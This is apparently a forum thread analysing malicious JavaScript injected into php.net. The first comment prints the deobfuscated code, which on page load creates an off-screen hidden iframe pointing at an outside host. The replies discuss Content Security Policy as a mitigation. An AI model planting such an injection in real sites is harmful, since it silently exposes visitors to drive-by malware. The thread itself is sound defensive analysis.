6 ms·
This code deobfuscates basically to tmp3 = (tmp2 = document.createElement('iframe')).style; tmp2.src = 'http://lnkhere.reviewhdtv.co.uk/stat.ht
by ingenter 13y ago
This code deobfuscates basically to
tmp3 = (tmp2 = document.createElement('iframe')).style;
tmp2.src = 'http://lnkhere.reviewhdtv.co.uk/stat.htm';
tmp1 = (tmp0 = document.createElement('div')).style;
tmp1.width = tmp1.height = '-10000px';
tmp1.overflow = 'hidden'; tmp1.position = 'absolute'; tmp1.left = '-10000px';
tmp4 = document.getElementsByTagName('div');
tmp4[Math.floor(Math.random() * tmp4.length)].appendChild(tmp0).appendChild(tmp2);
Wrapped into onload.
- hwh 13y agoI really love that part where a random div is selected for inserting the iframe...
- officialjunk 13y agoIf there is one. Could be a little more robust :)
- oneeyedpigeon 13y agoObviously the hackers have a thing about non-semantic markup :-) (yes, yes, I know that DIVs aren't really non-semantic - it's a joke)
- yeukhon 13y agoWould CSP solve this issue? Looks like we could try restricting iframe-src? But if they are able to hack into the server, I supposed there is nothing to do then...
- handsomeransoms 13y agoIf php.net used CSP, they would have been able to mitigate this attack with the frame-src directive [1]. [1] http://www.w3.org/TR/CSP/#frame-src http://www.w3.org/TR/CSP/#frame-src
- yeukhon 13y agoIf they are able to hack the physical box (I assume this is how they did the injection), then it is possible for them to modify the CSP rule too. If my assumption is correct, then CSP won't help unless we separate the source server and the proxy server from each other.